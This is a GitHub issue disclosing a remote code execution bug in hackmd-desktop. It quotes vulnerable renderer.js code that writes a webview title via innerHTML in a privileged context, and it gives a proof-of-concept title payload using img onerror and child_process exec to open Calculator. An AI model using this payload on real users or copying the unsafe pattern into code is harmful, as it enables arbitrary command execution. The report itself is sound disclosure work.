hackmd-desktop remote code execution

Hi, I find a RCE in hackmd-desktop when viewing a evil note.

In renderer.js

```js
webview.addEventListener('dom-ready', function () {
    // set webview title
    document.querySelector('#navbar-container .title').innerHTML = webview.getTitle()
    document.querySelector('title').innerHTML = webview.getTitle()
})
```

It will render the title of the webview in a privileged context.

If we use <a> tag or a XSS(https://github.com/hackmdio/codimd/issues/1233) to redirect to a evil page with a payload in title like this.

```html
<head>
  <title><img src=1 onerror="process.mainModule.require('child_process').exec('open /Applications/Calculator.app')"></title>
</head>
```

It will execute the command in the payload and a calculator will pop up.



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

hackmd-desktop remote code execution #18

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

hackmd-desktop remote code execution #18

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions